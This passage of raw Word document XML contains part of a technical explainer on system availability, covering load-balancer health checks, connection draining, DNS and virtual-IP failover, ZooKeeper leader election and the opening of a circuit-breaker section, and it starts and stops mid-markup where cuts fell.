      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Health Checking Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7CA95" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08238748" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Load balancers don't just route traffic — they continuously probe backend servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56097DC4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active health checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> LB sends periodic HTTP requests (e.g., GET /health every 5s). If 3 consecutive checks fail, the node is marked unhealthy and removed from the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452AB347" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passive health checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> LB monitors actual traffic responses. If a backend returns 5xx errors or times out beyond a threshold (e.g., 50% of requests in a 10-second window), it's marked unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C73ED" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The subtlety:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Health check intervals and thresholds directly affect availability. Too aggressive (check every 100ms, fail after 1 miss) → false positives, causing healthy nodes to be removed. Too conservative (check every 30s, fail after 5 misses) → 2.5 minutes of sending traffic to a dead node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68095D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Connection Draining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C0C74" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When a node is being removed (for deployment or failure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B6858D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Stop sending </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> connections to the node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E29AC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>existing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> connections to complete (with a timeout, e.g., 30 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19016EDA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>After timeout, forcibly close remaining connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6706509F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This prevents request failures during planned removals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784FE323" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Load Balancing at Multiple Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9ADD4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-level (L3):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> GeoDNS routes users to the nearest data center. TTLs of 30–60 seconds mean failover is slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E5815" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L4 (Transport):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Routes based on IP/port. Very fast, low overhead. Cannot inspect HTTP content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E261510" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L7 (Application):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Routes based on HTTP headers, paths, cookies. Can do content-based routing, but higher overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4602F555" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> You typically layer these. DNS for global distribution → L4 for regional cluster selection → L7 for service-level routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A94B8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="717C1F3C">
          <v:rect id="_x0000_i1690" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="317844B1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Failover Strategies — Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEFF8DD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 DNS Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B29D4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F06116" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Multiple A records (or CNAME) point to different IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9763D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Health checks determine which IPs are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC9D58E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>On failure, the unhealthy IP is removed from DNS responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1288CB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> DNS TTL caching. Even if you set TTL to 30 seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16B647" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Many resolvers ignore low TTLs and cache for longer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B962A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Client libraries cache DNS independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C90F7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Java's JVM, by default, caches DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>forever</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (configurable but often overlooked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E72270C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> DNS failover can take 5–30 minutes to fully propagate. It's a coarse-grained mechanism, suitable for disaster recovery, not for sub-second failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C50F6F5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Virtual IP (VIP) Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F2218" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works (e.g., VRRP/Keepalived):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BCDC2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A Virtual IP is shared between two machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C1598E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>The active machine responds to ARP requests for the VIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28955A67" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A heartbeat protocol runs between active and standby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9F5A4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If the active fails, the standby sends a Gratuitous ARP announcing it now owns the VIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D114E58" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Network switches update their MAC tables, traffic flows to the new node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF787E5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Speed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Sub-second failover (typically 1–3 seconds). Much faster than DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722534D4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Works only within a single L2 network segment (same subnet/data center). For cross-DC failover, you need BGP anycast or DNS-based approaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1868A4A6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Consensus-Based Leader Election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181430F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> ZooKeeper, etcd, Consul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F64641" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works (ZooKeeper example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F2011C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All nodes create an ephemeral sequential znode under a common path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2157C8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The node with the lowest sequence number is the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D314781" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Each non-leader node watches the next-lower znode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46911460" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If the leader dies, its ephemeral node disappears (session timeout, typically 2–10 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C79206" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The next node in sequence detects this via its watch and becomes leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139C046" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes of the session timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> ZooKeeper uses heartbeats between client and server. If the server doesn't hear from the client within the session timeout, it considers the client dead and removes its ephemeral nodes. This timeout is the floor for your failover time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92444D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="41C72A85">
          <v:rect id="_x0000_i1691" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39531604" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Circuit Breaker Pattern — Preventing Cascade Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43805B57" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem it solves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3CE1D0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Service A calls Service B. Service B becomes slow (not dead, just slow — the worst failure mode). Service A's threads pile up waiting for B's responses. A's thread pool exhausts. Now A can't serve any requests, including those that don't need B. A's callers time out. Cascade propagates upstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFADCB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the circuit breaker works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB3EA8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Three states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F7AE4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Closed (normal):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Requests pass through. Failures are counted. If failure rate exceeds threshold (e.g., 50% in a 10-second window), transition to Open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A37B8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open (tripped):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> All requests are immediately rejected (fail-fast) without calling the downstream. A timer starts (e.g., 30 seconds). After the timer, transition to Half-Open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE88534" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Half-Open (probing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Allow a limited number of requests through. If they succeed, transition back to Closed. If they fail, transition back to Open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B034B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical implementation details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCA2132" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> What counts as a failure? Timeouts, 5xx errors, connection refused? Be precise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6869E9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Sliding window (last N requests or last T seconds) vs. tumbling window. Sliding is more responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3D4F3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thresholds:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Too sensitive → trips on transient errors. Too lenient → doesn't protect against real failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD6F27" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
